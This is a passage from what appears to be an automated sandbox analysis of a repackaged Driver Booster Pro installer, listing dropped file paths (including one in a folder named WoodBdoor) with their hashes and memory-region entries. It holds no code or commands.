    10f81dc44f2c0fec5c33789cf8905b464d90d379f2e2c746458a544adc817858

    SHA512

    823b9323e519aa254e87218ccb54a2dbcaa0a7161db3bf59e4071597611fd5b995daaf50e9912c8c4857faa379d53706729cb566459b8ac32ce490f667a6eee5

  • C:\Program Files (x86)\IObit\Driver Booster\version.dll

    Filesize

    5.3MB

    MD5

    cc165af6a6e4978c66a86b25cf58b92b

    SHA1

    3767e079d784c5a2b5088de7c172da1c1bf63daf

    SHA256

    4e12ff9a72b7c2357f46ef645400cb6311330ced73ee787244c85ba7c57e8c8e

    SHA512

    29ed9563b901b818e69b17861ed55c8e0866f535ead9e1e67926ccaf587bbf00270b088111627a56795f1aff2ba9fab6c01407fa436cea81163e2db958304623

  • C:\ProgramData\WoodBdoor\main.bat

    Filesize

    276KB

    MD5

    76486a77a238f18979c948c491d402ce

    SHA1

    14933d50d304b4fc36f057177aebe9dbaa3a22b7

    SHA256

    cfca5d912f6a8eba1282d4c9230f403e5c061486dac3470225ef0ea6db608cff

    SHA512

    c642219feb7d0e5445f6aeac9243f8ce6285242c9adaeda94021b3c879a6cea67c60c713a93cb17aef9d208a47df00839d34dda1eda78fa0e88bd005731cc0cc

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    b0075e9a36a93d3ffa2ef163ab1d3e49

    SHA1

    ec27c0ad52ed8219a29d1858fc9aec1eb2344d82

    SHA256

    df264ccc127530484d996bff660602841927bef7b9fba844e545fea1884da9a0

    SHA512

    22281ba938d1117bc92f45450fde454772f6f62fe9b09eb9c2129eff44d406be2895f693eeeafdbcc606017f7d4a2d40d931a378ac1d09edd16b2616b33632b8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    52b2471ced63c4b21d21e0ce2c746b8e

    SHA1

    dded0af9354be7387208612b905492f5ca526f0b

    SHA256

    ee6d1b2eead2b89cceb2bc8a42e70c96832014af3678502ba408c7c06084c799

    SHA512

    2fb46e5a20165af8c932e47dcaa7c31e178ccdec6376b5b7653d285cb6238a220b0579794e3329b9c322b4c2c79ebeb029e4c32e5e8972eab34eab47368f729f

  • C:\Users\Admin\AppData\Local\Temp\HWiNFO64A_151.SYS

    Filesize

    61KB

    MD5

    b8b796586c1c177ce49dac10c57088ea

    SHA1

    37df4c40300da4ef18971ef4dff96c864c3e463a

    SHA256

    a6e75c3a21436941e9a6a111fe3a708be1753ab656ba247a40b401206096641c

    SHA512

    e4039f6cb66115fcd01845ccc1cf3d0cff5791f2c7b5aa32a6fe741d8317e865e608e99174ecb13d5bd1130f0b12811c8f7bfd60b0e00b869c4d84d0265ca9d5

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2vhncsz5.qpi.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\is-95JB8.tmp\b2p.dll

    Filesize

    22KB

    MD5

    ab35386487b343e3e82dbd2671ff9dab

    SHA1

    03591d07aea3309b631a7d3a6e20a92653e199b8

    SHA256

    c3729545522fcff70db61046c0efd962df047d40e3b5ccd2272866540fc872b2

    SHA512

    b67d7384c769b2b1fdd3363fc3b47d300c2ea4d37334acfd774cf29169c0a504ba813dc3ecbda5b71a3f924110a77a363906b16a87b4b1432748557567d1cf09

  • C:\Users\Admin\AppData\Local\Temp\is-95JB8.tmp\botva2.dll

    Filesize

    37KB

    MD5

    67965a5957a61867d661f05ae1f4773e

    SHA1

    f14c0a4f154dc685bb7c65b2d804a02a0fb2360d

    SHA256

    450b9b0ba25bf068afbc2b23d252585a19e282939bf38326384ea9112dfd0105

    SHA512

    c6942818b9026dc5db2d62999d32cf99fe7289f79a28b8345af17acf9d13b2229a5e917a48ff1f6d59715bdbcb00c1625e0302abcfe10ca7e0475762e0a3f41b

  • C:\Users\Admin\AppData\Local\Temp\is-95JB8.tmp\iswin7logo.dll

    Filesize

    39KB

    MD5

    1ea948aad25ddd347d9b80bef6df9779

    SHA1

    0be971e67a6c3b1297e572d97c14f74b05dafed3

    SHA256

    30eb67bdd71d3a359819a72990029269672d52f597a2d1084d838caae91a6488

    SHA512

    f2cc5dce9754622f5a40c1ca20b4f00ac01197b8401fd4bd888bfdd296a43ca91a3ca261d0e9e01ee51591666d2852e34cee80badadcb77511b8a7ae72630545

  • C:\Users\Admin\AppData\Local\Temp\is-C6PJR.tmp\Driver.Booster.10.0.0.65.tmp

    Filesize

    1.2MB

    MD5

    790761a71cb61ac50c7d04b3da72a167

    SHA1

    6558d25b86327810bf34f256fdf4dd94127992e2

    SHA256

    8336a622b1b6469a2b2834381e4a15d39988145e1915c249be8dd359ebd28e68

    SHA512

    90b9d09e59c06c3b7e3c0eb45e072fcf4eeb846f8a43179ce7910ef1faa0b15c85c187a509c1b3d308b3f5b06518c17c9ce9a668a11bf22a4495f0c593a99ad3

  • C:\Users\Admin\AppData\Local\Temp\is-GE40O.tmp\Driver.Booster.10.0.0.65.exe

    Filesize

    28.4MB

    MD5

    cdf3d43e50622011984ed17718ce8a90

    SHA1

    65b0bb629a98643c4c5e33f53de75255678fbe9b

    SHA256

    36ec957fb97cdc1ccf17208f1df58437cb724a34b3106e6bdb91ed35b676da0b

    SHA512

    c2ea4ef66dffd4b1d1e12ad89c5e94919051f53022a23c91462330b7bc5a028f8631e6602fd6ca71ee0d9dce7363a01d5dfa0d7ad0e977d639bbca59d86bb67e

  • C:\Users\Admin\AppData\Local\Temp\is-GE40O.tmp\_isetup\_iscrypt.dll

    Filesize

    2KB

    MD5

    a69559718ab506675e907fe49deb71e9

    SHA1

    bc8f404ffdb1960b50c12ff9413c893b56f2e36f

    SHA256

    2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

    SHA512

    e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

  • C:\Users\Admin\AppData\Local\Temp\is-MUDGM.tmp\DriverBoosterPro.tmp

    Filesize

    3.2MB

    MD5

    0b97243c98d366de57c9eee8322818cb

    SHA1

    4201a82cf7e27478512fb1fc0af97adf8cfdf2d4

    SHA256

    19f13e32e13b81935aea971ef00163c6b10ce6f1121bd6a3a6f0e7a69ad24bdf

    SHA512

    4e957c9b0c9c6e2f0b4404201807a631ee16c599cebe16089d0a6e0c059059c2a0944a1c44dac354eee95fc588633fe8913aed7abf8b7061ca77237fc8a0007e

  • C:\Users\Admin\AppData\Roaming\IObit\Driver Booster\Config.ini

    Filesize

    640B

    MD5

    9aed983e875b53f1f86da5886308a648

    SHA1

    37d24f241182e700ac7c993725e322948ab1cd03

    SHA256

    c33c20283a0095486a5d4145d7e537b57f7503e8f2554b04d0101adbfc0f71cf

    SHA512

    a2f4c0941d91320e012f93678761b9ff4eb684b03e00b57cec5efc37a1f69e33809400b3bc3d73d6eafbb055feb6ff564e0488d8d18be81b8739787f8ad49ecf

  • C:\Users\Admin\AppData\Roaming\IObit\Driver Booster\Config.ini

    Filesize

    790B

    MD5

    9fdab83dd7359b9a45f3f889155c6ec7

    SHA1

    70bc61e79b55e728c379ee9c3765f912f0707982

    SHA256

    912b8298288cc9974b783c7fbcd3c586f4f64677ab70a68c9d5afc97f5610f12

    SHA512

    396725f82ecf8c613edf5349240e9c0d8e613455369f37cfd546f02069dcb61f93049e72e243f4bb69592daa22d1284d894f233f4e05e143156f83bc58a81ef6

  • C:\Users\Admin\AppData\Roaming\IObit\Driver Booster\Config.ini

    Filesize

    846B

    MD5

    57d828dd9c168883da961e0fa037f209

    SHA1

    04955e638625ad839b5fc866b54e3a466f0fc674

    SHA256

    aabf751a3e0e61ede94394c63a07aa1942aebc5297404fa150848067e2127742

    SHA512

    e7ddaff87ed2f1bebdc93e9a3bf9c01293d9b44b268b50c191ffdbfe6fe1217d908c8e6aa89ee1a604d8042bd9f79043e3a4a5d05d5f8d431e8d3b372e3e38ff

  • C:\Users\Admin\AppData\Roaming\IObit\Driver Booster\Config.ini

    Filesize

    964B

    MD5

    ed8c2428340114b8c436bab86983ce7b

    SHA1

    d1a2d7a86f0f8041388396312e6e3ef592ba6560

    SHA256

    e4a9b87dad9af0ab623ddd6fa2416b33a6c5a3c83576644efb1b973e0365b82c

    SHA512

    4625fffcb696142155b9be6d7639793dcf17afb95b50cf07d55b8cfe10bcd47a1c2b6bbc10b6dcc2d96905669dbd8ca2b87f8bec7ab1eac92faeea3f48934cc3

  • memory/216-889-0x00000000029C0000-0x0000000002ACD000-memory.dmp

    Filesize

    1.1MB

  • memory/216-887-0x0000000050000000-0x0000000050116000-memory.dmp

    Filesize

    1.1MB

  • memory/216-805-0x00000000005D0000-0x00000000005D1000-memory.dmp

    Filesize

    4KB

  • memory/216-807-0x0000000073000000-0x000000007387D000-memory.dmp

    Filesize

    8.5MB

  • memory/216-806-0x0000000000670000-0x0000000000671000-memory.dmp

    Filesize

    4KB

  • memory/216-842-0x00000000029C0000-0x0000000002ACD000-memory.dmp

    Filesize

    1.1MB

  • memory/216-888-0x0000000050120000-0x000000005030D000-memory.dmp

    Filesize

    1.9MB

  • memory/216-886-0x0000000000400000-0x00000000004E3000-memory.dmp

    Filesize

    908KB

  • memory/924-673-0x0000000000400000-0x0000000000431000-memory.dmp

    Filesize

    196KB

  • memory/1428-119-0x0000000006240000-0x0000000006594000-memory.dmp

    Filesize

    3.3MB

  • memory/1428-123-0x0000000006920000-0x000000000696C000-memory.dmp

    Filesize

    304KB

  • memory/1436-134-0x0000000005DB0000-0x0000000006104000-memory.dmp

    Filesize

    3.3MB

  • memory/1652-22-0x0000000000400000-0x000000000045F000-memory.dmp

    Filesize

    380KB

  • memory/1652-137-0x0000000000400000-0x000000000045F000-memory.dmp

    Filesize

    380KB

  • memory/1652-643-0x0000000000400000-0x000000000045F000-memory.dmp

    Filesize

    380KB

  • memory/1652-19-0x0000000000400000-0x000000000045F000-memory.dmp

    Filesize

    380KB

  • memory/1680-545-0x0000000010000000-0x0000000010237000-memory.dmp

    Filesize

    2.2MB

  • memory/1680-591-0x0000000000400000-0x0000000000431000-memory.dmp

    Filesize

    196KB

  • memory/1832-597-0x0000000061E00000-0x0000000061ECA000-memory.dmp

    Filesize

    808KB

  • memory/1832-592-0x0000000050000000-0x0000000050116000-memory.dmp

    Filesize

    1.1MB

  • memory/1832-593-0x0000000059800000-0x000000005986E000-memory.dmp

    Filesize

    440KB

  • memory/1832-594-0x0000000057000000-0x000000005703F000-memory.dmp

    Filesize

    252KB

  • memory/1832-595-0x0000000057800000-0x0000000057812000-memory.dmp

    Filesize

    72KB

  • memory/1832-590-0x0000000000400000-0x0000000000CBA000-memory.dmp

    Filesize

    8.7MB

  • memory/1832-576-0x0000000001220000-0x000000000145E000-memory.dmp

    Filesize

    2.2MB

  • memory/1832-573-0x0000000001180000-0x0000000001217000-memory.dmp

    Filesize

    604KB

  • memory/1832-598-0x0000000001180000-0x0000000001217000-memory.dmp

    Filesize

    604KB

  • memory/1832-599-0x0000000001220000-0x000000000145E000-memory.dmp

    Filesize

    2.2MB

  • memory/1832-596-0x0000000050120000-0x000000005030D000-memory.dmp

    Filesize

    1.9MB

  • memory/2332-644-0x0000000002BF0000-0x0000000002BF1000-memory.dmp

    Filesize

    4KB

  • memory/2332-651-0x000000000B700000-0x000000000B859000-memory.dmp

    Filesize

    1.3MB

  • memory/2332-649-0x0000000006530000-0x0000000006600000-memory.dmp

    Filesize

    832KB

  • memory/2332-648-0x0000000005E20000-0x0000000005F2D000-memory.dmp

    Filesize

    1.1MB

  • memory/2332-646-0x0000000073000000-0x000000007387D000-memory.dmp

    Filesize

    8.5MB

  • memory/2332-645-0x0000000002C00000-0x0000000002C01000-memory.dmp

    Filesize

    4KB

  • memory/2332-662-0x000000000D380000-0x000000000D394000-memory.dmp

    Filesize

    80KB

  • memory/2332-698-0x000000000D520000-0x000000000D5B2000-memory.dmp

    Filesize

    584KB

  • memory/2332-628-0x0000000001200000-0x000000000143E000-memory.dmp

    Filesize

    2.2MB

  • memory/2332-650-0x0000000006600000-0x000000000669B000-memory.dmp

    Filesize

    620KB

  • memory/2332-626-0x0000000001160000-0x00000000011F7000-memory.dmp

    Filesize

    604KB

  • memory/2816-2-0x0000000000401000-0x00000000004B7000-memory.dmp

    Filesize

    728KB

  • memory/2816-0-0x0000000000400000-0x0000000000500000-memory.dmp

    Filesize

    1024KB

  • memory/2816-84-0x0000000000400000-0x0000000000500000-memory.dmp

    Filesize

    1024KB

  • memory/3512-606-0x0000000000400000-0x000000000053F000-memory.dmp

    Filesize

    1.2MB

  • memory/3512-142-0x0000000009740000-0x000000000974F000-memory.dmp

    Filesize

    60KB

  • memory/3512-140-0x00000000739F0000-0x0000000073A0B000-memory.dmp

    Filesize

    108KB

  • memory/3512-59-0x0000000009740000-0x000000000974F000-memory.dmp

    Filesize

    60KB

  • memory/3512-55-0x0000000071AC0000-0x0000000071AD1000-memory.dmp

    Filesize

    68KB

  • memory/3512-609-0x0000000009740000-0x000000000974F000-memory.dmp

    Filesize

    60KB

  • memory/3512-608-0x0000000071AC0000-0x0000000071AD1000-memory.dmp

    Filesize

    68KB

  • memory/3512-607-0x00000000739F0000-0x0000000073A0B000-memory.dmp

    Filesize

    108KB

  • memory/3512-38-0x00000000739F0000-0x0000000073A0B000-memory.dmp

    Filesize

    108KB

  • memory/3512-144-0x0000000000400000-0x000000000053F000-memory.dmp

    Filesize

    1.2MB

  • memory/3512-139-0x0000000000400000-0x000000000053F000-memory.dmp

    Filesize

    1.2MB

  • memory/3512-641-0x0000000000400000-0x000000000053F000-memory.dmp

    Filesize

    1.2MB

  • memory/3512-141-0x0000000071AC0000-0x0000000071AD1000-memory.dmp

    Filesize

    68KB

  • memory/3548-6-0x0000000000400000-0x000000000073B000-memory.dmp

    Filesize

    3.2MB

  • memory/3548-82-0x0000000000400000-0x000000000073B000-memory.dmp

    Filesize

    3.2MB

  • memory/3624-894-0x0000000002020000-0x0000000002021000-memory.dmp

    Filesize

    4KB

  • memory/3624-895-0x0000000002030000-0x0000000002031000-memory.dmp

    Filesize

    4KB

  • memory/3624-896-0x0000000073000000-0x000000007387D000-memory.dmp

    Filesize

    8.5MB

  • memory/4688-99-0x0000000007380000-0x0000000007423000-memory.dmp

    Filesize

    652KB

  • memory/4688-101-0x00000000074B0000-0x00000000074CA000-memory.dmp

    Filesize

    104KB

  • memory/4688-85-0x0000000006180000-0x000000000619E000-memory.dmp

    Filesize

    120KB

  • memory/4688-87-0x0000000007340000-0x0000000007372000-memory.dmp

    Filesize

    200KB

  • memory/4688-88-0x00000000755A0000-0x00000000755EC000-memory.dmp

    Filesize

    304KB

  • memory/4688-98-0x0000000006740000-0x000000000675E000-memory.dmp

    Filesize

    120KB

  • memory/4688-100-0x0000000007AF0000-0x000000000816A000-memory.dmp

    Filesize

    6.5MB

  • memory/4688-81-0x0000000005DB0000-0x0000000006104000-memory.dmp

    Filesize

    3.3MB

  • memory/4688-68-0x0000000005B30000-0x0000000005B96000-memory.dmp

    Filesize

    408KB

  • memory/4688-67-0x0000000005AC0000-0x0000000005B26000-memory.dmp

    Filesize

    408KB

  • memory/4688-66-0x00000000051E0000-0x0000000005202000-memory.dmp

    Filesize

    136KB

  • memory/4688-65-0x0000000005320000-0x0000000005948000-memory.dmp

    Filesize

    6.2MB

  • memory/4688-61-0x0000000002C10000-0x0000000002C46000-memory.dmp

    Filesize

    216KB

  • memory/4688-86-0x00000000061D0000-0x000000000621C000-memory.dmp

    Filesize

    304KB

  • memory/4688-102-0x0000000007510000-0x000000000751A000-memory.dmp

    Filesize

    40KB

  • memory/4688-103-0x0000000007740000-0x00000000077D6000-memory.dmp

    Filesize

    600KB

  • memory/4688-104-0x00000000076B0000-0x00000000076C1000-memory.dmp

    Filesize

    68KB

  • memory/4688-105-0x00000000076F0000-0x00000000076FE000-memory.dmp

    Filesize

    56KB

  • memory/4688-108-0x0000000007730000-0x0000000007738000-memory.dmp

    Filesize

    32KB

  • memory/4688-107-0x00000000077E0000-0x00000000077FA000-memory.dmp

    Filesize

    104KB

  • memory/4688-106-0x0000000007700000-0x0000000007714000-memory.dmp

    Filesize

    80KB

  • memory/4772-893-0x0000000003DF0000-0x0000000003EFD000-memory.dmp

    Filesize

    1.1MB

  • memory/4772-897-0x00000000041D0000-0x00000000041E4000-memory.dmp

    Filesize

    80KB

  • memory/4772-890-0x0000000000820000-0x0000000000821000-memory.dmp

    Filesize

    4KB

  • memory/4772-892-0x0000000073000000-0x000000007387D000-memory.dmp

    Filesize

    8.5MB

  • memory/4772-891-0x0000000000830000-0x0000000000831000-memory.dmp

    Filesize

    4KB